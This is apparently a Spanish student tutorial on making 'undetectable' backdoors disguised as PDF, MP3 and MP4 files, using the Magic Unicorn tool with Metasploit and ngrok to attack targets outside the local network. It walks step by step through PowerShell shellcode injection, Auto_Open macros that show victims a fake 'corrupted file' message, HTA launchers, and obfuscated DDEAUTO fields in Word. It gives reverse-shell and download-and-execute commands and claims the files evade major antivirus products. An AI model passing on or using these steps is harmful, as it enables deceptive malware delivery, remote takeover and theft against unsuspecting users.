VIRUS INDETECTABLE DENTRO DE ARCHIVOS PDF, MP3 & MP4 PARA REALIZAR ATAQUES OVER-LAN (FUERA DE LA RED)

UNICORNIO: DEGRADAR EL ATAQUE E INYECTAR SHELLCODE DIRECTAMENTE EN LA MEMORIA

Un unicornio es una herramienta simple para usar un ataque de degradación de PowerShell e inyectar shellcode directamente en la memoria. Basado en los ataques de PowerShell de Matthew Graeber y la técnica de bypass de PowerShell presentada por David Kennedy (TrustedSec) y Josh Kelly en Defcon 18. El uso es simple, simplemente ejecute Magic Unicorn (asegúrese de que Metasploit esté instalado si utiliza los métodos Metasploit y se encuentra en la ruta correcta) y el magic unicorn generará automáticamente un comando de PowerShell que necesita simplemente cortar y pegar el código de PowerShell en una ventana de línea de comandos o A través de un sistema de entrega de carga útil. Unicorn es compatible con su propio shellcode, cobalt strike y Metasploit.

INSTRUCCIONES DE ATAQUE POWERSHELL

 Ahora todo se genera en dos archivos, powershell_attack.txt y unicorn.rc. El archivo de texto contiene todo el código necesario para inyectar el ataque de PowerShell en la memoria. Tenga en cuenta que necesitará un lugar que admita la inyección remota de comandos de algún tipo. Muchas veces esto puede ser a través de un documento Excel / Word o psexec_commands dentro de Metasploit, SQL, etc. Hay tantas implicaciones y escenarios en los que puedes usar este ataque. Simplemente pegue el comando powershell_attack.txt en cualquier ventana del símbolo del sistema o donde tenga la capacidad de llamar al ejecutable de PowerShell y le devolverá un Shell. Este ataque también es compatible con Windows / download_exec para un método de carga útil en lugar de solo para las cargas útiles de Meterpreter. Cuando utilice la descarga y exec, simplemente coloque Python unicorn.py Windows / download_exec url = https://www.thisisnotarealsite.com/payload.exe y el código de PowerShell descargará la carga útil y se ejecutará. Nota: Necesitará tener un oyente habilitado para capturar el ataque.

INSTRUCCIONES DE ATAQUE MACRO 

Para el ataque de macro, deberá ir a Archivo, Propiedades, Cintas y seleccionar Desarrollador. Una vez que hagas eso, tendrás una pestaña de desarrollador. Cree una nueva macro, llámela Auto_Open y pegue el código generado en eso. Esto se ejecutará automáticamente. Tenga en cuenta que un mensaje le indicará al usuario que dice que el archivo está dañado y cerrará automáticamente el documento de Excel. ¡ESTO ES COMPORTAMIENTO NORMAL! Esto es engañar a la víctima para que piense que el documento de Excel está dañado. Debería obtener una cáscara mediante la inyección de PowerShell después de eso. Si está implementando esto contra Office365 / 2016 + versiones de Word, necesita modificar la primera línea de la salida de Sub Auto_Open () Para: Sub AutoOpen () El nombre de la macro en sí también debe ser "AutoOpen" en lugar del legado esquema de nombres "Auto_Open". 

NOTA: Al copiar y pegar el Excel, si hay espacios adicionales que se agregan, debe eliminarlos después de cada una de las secciones de código de PowerShell bajo la variable "x" o ¡se producirá un error de sintaxis!

HTA INSTRUCCIONES DE ATAQUE

El ataque HTA generará automáticamente dos archivos, el primero el index.html que le indica al navegador que use Launcher.hta que contiene el código de inyección malicioso de PowerShell. Todos los archivos se exportan a la carpeta hta_access / y habrá tres archivos principales. El primero es index.html, el segundo Launcher.hta y el último, el archivo unicorn.rc. Puede ejecutar msfconsole -r unicorn.rc para iniciar el escucha para Metasploit. Un usuario debe hacer clic en permitir y aceptar al usar el ataque HTA para que la inyección de PowerShell funcione correctamente.

Instrucciones de DDE Office COM Attack 

Este vector de ataque generará la fórmula DDEAUTO para colocar en Word o Excel. El objeto COM DDEInitilize y DDEExecute permiten crear fórmulas directamente dentro de Office, lo que hace que la capacidad de obtener la ejecución remota de código sin la necesidad de macros. Este ataque fue documentado y las instrucciones completas se pueden encontrar en: 

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ Para usar este ataque, ejecute los siguientes ejemplos: Python unicorn.py dde Python unicorn.py Windows / meterpreter / reverse_https 192.168.5.5 443 dde.

 Una vez generado, se generará un powershell_attack.txt que contiene el código de Office y el archivo unicorn.rc, que es el componente de escucha que puede ser llamado por msfconsole -r unicorn.rc para manejar la escucha de la carga útil. Además, también se exportará un download.ps1 (explicado en la última sección).

Para aplicar la carga útil, como ejemplo:

  Palabra abierta  Insertar pestaña -> Piezas rápidas -> Campo  Elija = (Fórmula) y haga clic en Aceptar. 

 Una vez que se inserta el campo, ahora debería ver "! Fin de fórmula inesperado"  Haga clic derecho en el campo, elija "Alternar códigos de campo"

 Pega el código del Unicornio.

 Guarde el documento de Word. Una vez que se abre el documento de Office, debe recibir un Shell a través de la inyección de PowerShell. Tenga en cuenta que DDE está limitado en el tamaño de caracteres y debemos usar Invoke-Expression (IEX) como el método para descargar. El ataque DDE intentará descargar download.ps1, que es nuestro ataque de inyección PowerShell, ya que estamos limitados a restricciones de tamaño. Deberá mover el archivo download.ps1 a una ubicación a la que pueda acceder la máquina víctima. Esto significa que necesita alojar el download.ps1 en un directorio de Apache2 al que tiene acceso. Puede notar que algunos de los comandos usan " {QUOTE ", estas son formas de enmascarar comandos específicos. En este caso, estamos cambiando WindowsPowerShell, powershell.exe e IEX para evitar la detección. Además, revise la URL, ya que tiene algunos métodos excelentes para no llamar DDE en absoluto.

MÉTODO DE GENERACIÓN DE CÓDIGO DE SHELL PERSONALIZADO 

Este método le permitirá insertar su propio código de Shell en el ataque Unicornio. El código de PowerShell aumentará el lado de la pila de powershell.exe (a través de VirtualAlloc) y lo inyectará en la memoria. Tenga en cuenta que para que esto funcione, el archivo txt al que apunta Unicorn debe estar formateado en el siguiente formato o no funcionará: 0x00,0x00,0x00 y así sucesivamente. Además, tenga en cuenta que hay restricciones de tamaño. El tamaño de longitud total del comando de PowerShell no puede exceder el tamaño de 8191. Este es el límite máximo de tamaño de argumento de línea de comando en Windows. Uso: 

 Python uniocrn.py shellcode_formatted_properly.txt shellcode A continuación, simplemente copie el comando de PowerShell a algo que tenga la capacidad de ejecutar comandos remotos.

2.1 POWERSHELL PowerShell es un Shell de línea de comandos y un lenguaje de scripting basado en tareas integrado en .NET. PowerShell ayuda a los administradores de sistemas y a los usuarios avanzados a automatizar rápidamente las tareas que administran sistemas operativos (Linux, macOS y Windows) y procesos. Los comandos de PowerShell permiten administrar los equipos desde la línea de comandos. Los proveedores de PowerShell permiten obtener acceso a almacenes de datos, como el Registro y el almacén de certificados, con la misma simplicidad con que se obtiene acceso al sistema de archivos. PowerShell incluye un analizador de expresiones muy completo y un lenguaje de scripting totalmente desarrollado.

NGROK

Ngrok es una de las plataformas de servicios de túneles más populares a través de las cuales pueden exponer fácilmente sus servidores locales que se encuentran detrás de NAT/ firewalls a la internet pública a través de túneles seguros.

Se conecta al servicio en la nube ngrok que acepta el tráfico en una dirección pública y transmite ese tráfico al proceso ngrok que se ejecuta en su máquina y luego a la dirección local que especifico.

¡CÓMO FUNCIONA?

Usted descarga y ejecuta un programa en su máquina y le proporciona el puerto de un servicio de red, generalmente un servidor web.

Se conecta al servicio en la nube ngrok que acepta el tráfico en una dirección pública y transmite ese tráfico al proceso ngrok que se ejecuta en su máquina y luego a la dirección local que especificó.

CARACTERÍSTICAS

Túneles seguros

Cree instantáneamente una URL HTTPS pública para un sitio web que se ejecuta localmente en su máquina de desarrollo.

Rápido

Los túneles ngrok se ejecutan con una versión optimizada de la tecnología que utiliza HTTP / 2 para que sus servicios tunelizados se carguen rápidamente.

1. Contraseña protegida

Configure las credenciales de autenticación http para proteger el acceso a su túnel y a las personas con las que lo comparte.

2. Soporte Websocket

¡Comparte tus aplicaciones web en tiempo real! ngrok túneles conexiones Websocket a través de túneles HTTP sin ningún cambio.

3. Repetir solicitudes de webhook

Desarrolle fácilmente integraciones de webhook simplemente "repitiendo" las solicitudes de webhook a su servidor de desarrollo.

4. Automatizar ngrok a través de API

Iniciar, detener y consultar dinámicamente el estado del túnel, todo con una simple API RESTful.

5. Solicitud de Inspección

Use la interfaz de inspección web de ngrok para comprender el tráfico de solicitud y respuesta HTTP a través de su túnel.

No más reenvío de puertos

No configure el reenvío de puertos en su enrutador ni pierda tiempo configurando soluciones DNS dinámicas. ngrok funciona en todas partes sin cambios, incluso cuando un dispositivo cambia las redes.

6. Túneles TCP

Exponga cualquier servicio en red a Internet, incluso aquellos que no usan HTTP como SSH.

7. Múltiples túneles simultáneos

Ejecute varios túneles simultáneamente con un solo cliente ngrok.

8. Sitios de host virtual de destino

Vuelva a escribir el Host encabezado de las solicitudes canalizadas para dirigirse a un sitio específico en su entorno de desarrollo WAMP / MAMP / Pow.

 Acceso a cuentas compartidas para equipos.

Las cuentas pueden compartir el acceso a dominios y direcciones reservados, lo que permite a múltiples desarrolladores colaborar en un proyecto mientras aún tienen sus propias credenciales.

PASOS

VÍDEO TUTORIAL

CONCLUSIÓN

Al finalizar estas prácticas, se evidenció que a medida que la tecnología evoluciona a pasos agigantados en relación a los beneficios y facilidades que esta brinda a las personas, de igual manera o en mayor proporción, aumentan las amenazas en todos los aspectos y formas que sean necesarias para camuflarlas, inclusive si se trata de una simple descarga de una imagen, canción, video o cualquier tipo archivo multimedia sin generar algún tipo de sospecha.

También, se logró implementar los respectivos pasos para llevar a cabo este típico de ataque backdoor camuflado en estos tipos de archivos de uso común, a través de las herramientas MAGIC UNICORN Y NGROK en el entorno de Kali Linux, proporcionadas por los diferentes autores que hicieron posible el desarrollo de estas herramientas Open Source, para la creación de archivos ejecutables “.EXE” con códigos PowerShell embebidos, haciéndolos indetectables para la mayoría de antivirus tales como Avast Antivirus, NOD32, Kaspersky Antivirus, AVG Antivirus entre otros de gran prominencia. Por lo cual además de tener un antivirus como medida de seguridad también tener activa la opción de extensiones de archivo proporcionada por nuestros sistemas operativos.